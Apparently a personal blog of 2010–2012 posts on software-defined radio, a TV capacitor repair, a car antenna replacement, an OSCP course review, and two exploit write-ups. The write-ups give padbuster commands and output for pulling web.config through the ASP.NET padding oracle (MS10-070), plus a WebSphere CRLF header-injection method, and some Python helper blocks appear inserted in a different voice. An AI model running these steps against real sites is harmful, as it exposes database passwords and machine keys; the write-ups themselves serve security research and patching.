Sunday, November 4, 2012

RTLSDR in Virtualbox

To get rtlsdr working in Ubuntu 12.04 in VirtualBox, just run the gnuradio build script; you can also enable USB 2.0 (you'll need to install an extension pack).  It took several minutes for the device to attach the first time (I was only using USB 1.1), so be patient (I originally thought it wasn't working).

Whether USB 1.1 or USB 2.0 is chosen, the sample rate through VirtualBox is still low enough that it drops packets at every sample rate I've tried, so I would not recommend it.  It does get enough valid data that you could probably work with it in many scenarios, so it's better than nothing, but I would not use rtlsdr in a VM if you can avoid it.

You will frequently need to disconnect and reconnect your rtlsdr, since it seems to lock up every once in a while.  It does this on a physical machine too, but it seems to happen more frequently in the VM.

Friday, November 2, 2012

GNURadio on Ubuntu 12.10 for RTLSDR

Very quick post.  I upgraded my Ubuntu laptop (with gnuradio built from the build script) from 12.04 to 12.10 and some of the dependencies seem broken.  I spent quite a while debugging it and rebuilt gnuradio from the script, but never resolved the issue.  I didn't try the gnuradio from apt, but I heard that was too old to support rtlsdr.  I couldn't find any discussions about this via Google, so I thought I'd post this here in case someone was curious about upgrading.  I'm guessing this will be fixed at some point once smarter people run into this issue and fix it (in the build script?).

Update: I did a fresh install of 12.10 and reinstalled gnuradio from the build script and everything is working fine now.  My issue could be isolated, but my takeaway is to not upgrade Ubuntu if you aren't willing to risk breaking your GNURadio install.

Saturday, May 5, 2012

Samsung TV Blown Capacitor - High Pitched Whine Sound

I had a Samsung TV that's known to have capacitor issues.  There is a capacitor settlement as a result of a class action lawsuit.  It was making a quiet but annoying high pitched whine sound.  This sound is normally from an inductor.

I couldn't find anything online about this, so that meant I was going to write this blog post when I fixed it to help others out.  I called the Samsung settlement line and they said this high pitched noise was not one of the symptoms of a blown capacitor.

I took the back panel off and there was a popped capacitor, right next to an inductor, some transistors and a heat sink.  The capacitor is presumably used in an LC circuit as part of the SMPS (switched-mode power supply).  Initially, I tried hot gluing the inductor to quiet the oscillations down, because the capacitor didn't look too blown.  The sound changed in pitch, but remained.

The next day I replaced the capacitor and the sound went away.  I used my multimeter and the capacitor was measuring 0 farads.  I tested some known good ones, so I was using the multimeter correctly.  I didn't have the right size capacitor handy, so I replaced the 2200uF 10V capacitor with a 220uF 50V capacitor.  It's not tuned to the right frequency (I think it's allowing the square root of 10 (3.16) times higher frequencies than the initial design), but the sound went away entirely, so I'm happy.


I called the Samsung line back and told them it was a blown cap and they said I'm still not eligible for anything because it wasn't exhibiting any of the known symptoms.  I don't know if it is worth pursuing, but it's annoying that there is a class action lawsuit to fix this issue, yet Samsung says I'm not covered.

The Fix
So in short, the fix (what you probably came here for) is to remove the back panel and look for a popped capacitor (the top will be lifted and there will be residue on it).  This capacitor will probably be in the position my screwdriver is pointing to; replace it with one of the same size.  I only used a soldering iron, solder, and a replacement capacitor.  You will probably want a 2200uF 10V (or greater) capacitor, which you can find (or something similar) at RadioShack.

Let me know if you are having the same issue or if this helped.  Just curious how widespread this is.

Wednesday, July 20, 2011

SC430 Antenna Mast Removal & Replacement

Going with a non-security post here to provide some helpful information that can be somewhat hard to find.


Choosing an Antenna
First, you need to get a replacement antenna. I ordered one from the eBay seller "tt_motor", which was far from OEM quality (as claimed) and it did not fit. He quickly gave me a refund, and then I ordered an antenna from "laynlow1". This was also a fairly cheap Chinese antenna. I heard these cheap antennas get quite a bit less reception than the OEM ones. After several months of use, it stopped extending all the way unless I was pulling on it as it went up. It made a grinding noise. Perhaps the wind bent this flimsy metal? I tried greasing it, but never had any luck.  I'm all about saving money, but in this case I couldn't find a good quality aftermarket replacement (please comment if you have). Next, I went with an OEM antenna from http://lexus.sewellparts.com/. It was ~$60 shipped with my discount for being a ClubLexus member.  The unit was noticeably higher quality than the ones I've ordered off eBay.  It fixed my grinding noise, but I just installed it last night at the time of this writing.  Update: I sold this car in 2015 and the antenna still operated without issues.

Replacing the Antenna
This is a two-person job.
  • Remove the antenna retaining nut.  Be careful not to scratch it.
  • With the key in the ignition switch "LOCK" position, press the "AM" and "DISC" buttons on the radio simultaneously with turning the ignition switch to "ACC". Then the radio "LCD" display will read "ANT" and the antenna mast will hyper-extend, disengaging the cable. You can let go of the "AM" and "DISC" buttons now.
  • With the ignition switch still in "ACC", the new cable is inserted to a full stop into the motor antenna assembly through the mast pipe hole in the body panel, with the teeth on the antenna cable toward the rear of the vehicle. 
  • As the person in the driver's seat switches the key to "LOCK", feed the cable and mast pipe in. 
  • After it retracts completely, replace the retaining nut.

Wednesday, June 8, 2011

Exploiting CVE-2008-4283 - HTTP Response Splitting (CRLF Injection) in WebSphere 5.1

I found this vuln a while back, but never successfully published the exploit after working with the vendor (IBM).  I say "successfully", because I tried submitting it to SecurityFocus but it never got updated.

In short, this is how to exploit it.

By inserting %0A's onto the ibm_security_logout URL, a line feed character is injected into the 302 redirect URL, which allows you to insert custom headers.  Since it's in a 302, your options are pretty limited, but you can still set a cookie.
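As an added illustration (not code from the original post or from WebSphere), here is a minimal Python model of the flaw described above beside the check that prevents it: a logout handler that copies a caller-supplied redirect target into a 302 Location header without rejecting CR/LF, and a hardened version that refuses such targets. The parameter name `exit_page_param` and the sample URLs are assumptions.

```python
import re
from urllib.parse import unquote

# Minimal model of the flaw described above, written for this page (not WebSphere's
# code): a logout handler copies a caller-supplied redirect target into the 302
# "Location" header. The parameter name `exit_page_param` is an assumption.

_CR_OR_LF = re.compile(r"[\r\n]")


def is_safe_redirect_target(exit_page_param: str) -> bool:
    """True only if the decoded target contains no CR or LF (the check that was missing)."""
    return _CR_OR_LF.search(unquote(exit_page_param)) is None


def build_redirect_vulnerable(exit_page_param: str) -> str:
    """Emit the 302 with no validation: a %0A in the parameter becomes a header break."""
    target = unquote(exit_page_param)
    return "HTTP/1.1 302 Found\r\nLocation: " + target + "\r\n\r\n"


def build_redirect_hardened(exit_page_param: str) -> str:
    """Same flow, but refuse a target that would split the header block."""
    if not is_safe_redirect_target(exit_page_param):
        raise ValueError("redirect target contains CR/LF; refusing to emit Location")
    return "HTTP/1.1 302 Found\r\nLocation: " + unquote(exit_page_param) + "\r\n\r\n"


def header_names(raw_response: str) -> list:
    """Parse the header block leniently (bare LF accepted, as many clients do) and
    return the header names a client would see; a second name means injection worked."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    lines = head.replace("\r\n", "\n").split("\n")[1:]  # drop the status line
    return [line.split(":", 1)[0].strip() for line in lines if ":" in line]
```

Run `header_names()` over both builders with a target containing `%0A` to see the extra header appear in the vulnerable output and the hardened builder refuse it.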

Here's a normal URL:

If the session cookie is not updated upon authentication, you can link this user and set their cookie to yours, and have them log you in.

This URL is an example exploit which sets a cookie:

Sunday, March 27, 2011

OSCP (Offensive Security Certified Professional) Course Review

I promised myself I would write a summary of the OSCP class once I completed it, since there isn't much information about it.  It's not a very well known certification, but it's well respected by the people that are familiar with it.  There's quite a bit that is secret, such as the details of the exam, but I'll try to give you an idea of what to expect if you're considering taking the class.  I took it in the winter of 2009-2010, so some details may become outdated as time goes on and the class is revised.

Prerequisite Knowledge and Time Commitment
You can buy 30 or 60 days of class/lab time, and you can also buy 30-day extensions. It culminates in a 24-hour exam (you don’t have to use the whole 24 hours) which you can schedule whenever you want, starting after 6am (Central Time) if I recall correctly. The test is fairly cheap to retake, so passing it on the first try is more a matter of time and pride than of cost.

I’m sure some people could pass the test without even taking the class, but there are also some people on the other end of the spectrum who start with no knowledge of Linux. I had some very basic experience with the topics covered, and I think I figured the time commitment was about 355 hours. I did the 60 day lab, then waited a bit, then extended it for another 30 days to finish the final challenges, then did some additional studying on my own. I started in October and took the test in April. 

The Course
The course material is something like 13 chapters (I think you can find the syllabus online) and it has a video and PDF that go through each. It goes through a lot of the basic security stuff (e.g. ARP spoofing, password cracking, etc.), but in the middle it hops into what I consider the main section, which is on exploitation through Metasploit, as well as fuzzing and writing your own exploits. It gets into some intermediate exploit writing, but for the most part it’s simple stack-based buffer overflows. It gives you a good introduction to these topics, then kind of drops you into the deep end and gives you some IPs to root.  Some more training, such as examples of rooting boxes, would have been nice here for someone who isn't a professional pentester.  Once you finish all the class material, there is a set of final challenges which are basically just some boxes to root. There are also quite a few additional boxes on the network that you can root. All that prepares you well for the test, but it doesn’t give you the answers.

The part about the class that I hated was that if you asked almost any question, the answer would usually be this: “http://www.offensive-security.com/when-things-get-tough.php”. Even when I tried abstracting my question so it wasn’t related to the class, it was very tough to get an answer from anyone in #offsec. On one hand, it is good to not serve people the answers, but on the other hand when you're completely stuck I don't think it's too much to ask whether you're headed in the right direction.  If I wanted to learn everything on my own without any guidance, I wouldn't have paid for the OSCP in the first place.  Having said that, overall it was an awesome class and I’d recommend it.  It’s so much fun to finally root a box that you've been attacking for the last 8 hours.  In short, it's probably one of the most frustrating yet satisfying experiences you'll come across.

Tips
· Do the class while it’s cold out. It was much easier to park myself in front of the computer on the nights and weekends during the winter.

· You don’t need to take notes as thoroughly as the course implies at the beginning, but you should keep track of exactly which boxes you have rooted. All they really care about is whether you pass the test (and whether you went the extra mile if it’s borderline).

· If you want additional practice, set up a lab or enter one of the many online CTF’s. I found NetWars to be good practice, but it doesn’t look like they have rounds going anymore.

Thursday, October 21, 2010

Exploiting .NET Padding Oracle Attack MS10-070 (CVE-2010-3332) and Bypassing Microsoft's Workaround

This page has been (lightly) updated and moved to https://trustfoundry.net/exploiting-net-padding-oracle-attack-ms10-070-cve-2010-3332-and-bypassing-microsofts-workaround/

This week I ran into my first ASP.NET site since MS10-070.  I had read Bryan Holyfield and Giorgio Fedon's posts, which were great posts with groundbreaking information, although it was still unclear as to how to actually exploit the vulnerability.  Tim Medin and I worked together to exploit this vulnerability.  He posted his experiences at Security Whole.

This is a very widespread and severe vulnerability.  If you have not applied the patch yet, apply it now.  One interesting thing to keep in mind about this vulnerability is that all Windows 2000 boxes will be permanently exposed to it, since their support is EoL’d.

Interacting with the tool and trying to interpret the correct steps through blogs was the most difficult part of exploiting this vulnerability. The blog posts were great, but at the same time were confusing.  I still have a few unanswered questions, but I'd like to share my experience to help out others attempting to exploit this vulnerability.  Without further ado, here are the steps to obtain the web.config for a site that has the original workaround ([padding] errors issue 302 redirects via CustomErrors).


Prep for the attack 
  • First, obtain a valid “d” value by observing a normal link to ScriptResource.axd (you can use ScriptResource.axd as the URL throughout this attack).
  • Before starting, it’d be a good idea to verify the site is vulnerable by using ms10-070CheckPatch. This does some slight decoding and takes the length modulo 8.  The patch adds more characters to the "d" value.  I'd check a few parameters if you want to be sure it's vulnerable (are multiples of 8 not possible with the patch?).
  • If the ScriptResource.axd is authenticated, set up Burp Intruder to keep the cookies alive.
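As an added example (not code from the original post or from padbuster), a Python version of the length check the patch-checker step describes: decode the `d` value and test whether the result is a whole number of cipher blocks. It assumes `d` uses .NET's UrlToken encoding (the format padbuster's `-encoding 3` expects); the sample values are constructed, not captured from any site.

```python
import base64

# Added for this page (not code from the original post or from padbuster): decode a
# ScriptResource.axd "d" value and apply the post's "length modulo 8" heuristic.
# Assumption: "d" is .NET UrlToken-encoded (base64 with '-' for '+' and '_' for '/',
# '=' padding stripped, and a trailing digit giving how many '=' were stripped), which
# is the format padbuster's "-encoding 3" expects.


def urltoken_encode(raw: bytes) -> str:
    b64 = base64.b64encode(raw).decode("ascii")
    pad = b64.count("=")
    return b64.rstrip("=").replace("+", "-").replace("/", "_") + str(pad)


def urltoken_decode(token: str) -> bytes:
    if not token or token[-1] not in "012":
        raise ValueError("missing trailing padding digit")
    body, pad = token[:-1], int(token[-1])
    std = body.replace("-", "+").replace("_", "/") + "=" * pad
    return base64.b64decode(std, validate=True)


def ciphertext_length_aligned(token: str, block_size: int = 8) -> bool:
    """The post's heuristic: an unpatched 'd' value decodes to whole cipher blocks,
    while the patch adds characters, so the decoded length usually stops being a
    multiple of the block size. True means 'possibly unpatched', not proof; the
    post itself wonders whether a patched value could still land on a multiple of 8."""
    return len(urltoken_decode(token)) % block_size == 0


# Constructed sample values (fixed byte patterns, not captured from any site).
SAMPLE_ALIGNED = urltoken_encode(bytes(range(32)))     # 32 bytes: whole blocks
SAMPLE_MISALIGNED = urltoken_encode(bytes(range(52)))  # 52 bytes: 4 bytes over
```

Check several different `d` values from the same site, as the post suggests, rather than trusting a single aligned result.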


The actual attack 
Bruteforce a valid T-block to use as a prefix (using -bruteforce) and be sure to get the right block size and encoding method.  If you can't get a valid oracle, try a different block size and encoding method.  If you do get a valid oracle, choose the option it suggests.
$ perl padbuster.pl "https://site.org/dir/ScriptResource.axd?d=xxxxxxxxxxxxxxxx" xxxxxxxxxxxxxxxx 16 -encoding 3 -bruteforce -log -verbose -cookies "ASP.NET_SessionId=f2471ac5-e515-..."
Once you have found a T-Block request, it'll say something like this, where the "d" value is your new T-block to use as prefix.
Attempt 15 - Status: 200 - Content Length: 393 https://site.org/dir/ScriptResource.axd?d=DgAAAAAAAAAAAAAAAAAAAM8X6Hz6gTDN5E1DDdDehBXoKFWTIM8UquygrlBs-oA68elaNxHtban...
Now we encrypt the plaintext using -prefix (from previous step) and -plaintext (using "|||~/web.config").

perl padbuster.pl "https://site.org/dir/ScriptResource.axd?d=xxxxxxxxxxxxxxxx" xxxxxxxxxxxxxxxx 16 -encoding 3 -plaintext "|||~/web.config" -noiv -prefix "DgAAAAAAAAAAAAAAAAAAAM8X6Hz6gTDN5E1DDdDehBXoKFWTIM8UquygrlBs-oA68elaNxHtban..." -cookies "ASP.NET_SessionId=f2471ac5-e515-..." 
...
———————————————————————————
** Finished *** 
[+] Encrypted value is: BXw6OSgQhp3YdMmkBqmuXQAAAAAAAAAAAAAAAAAAAAA1

Use the encrypted value from the above step to replace your “d” (ciphertext) value. Bruteforce the correct T-block using -bruteforce (this took us 21,000 requests, or several hours). When you get a valid T-block you can test it in your browser, and hopefully the title will say some garbage followed by your plaintext (“|||~/web.config”). The goal of this step is to brute force one of the magic values (as mentioned in Giorgio's blog) into the first two bytes (e.g. “r#”). The rest of the block doesn’t matter. Once you brute force the correct block you'll see a response with a much larger content length (instead of ~360 for responses that don't have the magic plaintext value).
Attempt 21906 - Status: 200 - Content Length: 12186
https://site.org/dir/ScriptResource.axd?d=kQBVAAAAAAAAAAAAAAAAAAV8Ojeeayad2TIMpAaprl0AAAAAAAAAAAAAAAAAAAAA0
Now simply retrieve the gzip encoded web.config file using the URL.



$ curl "https://site.org/dir/ScriptResource.axd?d=kQBVAAAAAAAAAAAAAAAAAAV8Ojeeayad2TIMpAaprl0AAAAAAAAAAAAAAAAAAAAA0" --insecure -H "Cookie: ASP.NET_SessionId=f2471ac5-e515-..." > web.config.gz
And unzip it using gunzip:

gunzip -c web.config.gz > web.config
Now open your web.config and you may have just compromised database passwords, the machine key, and other goodies.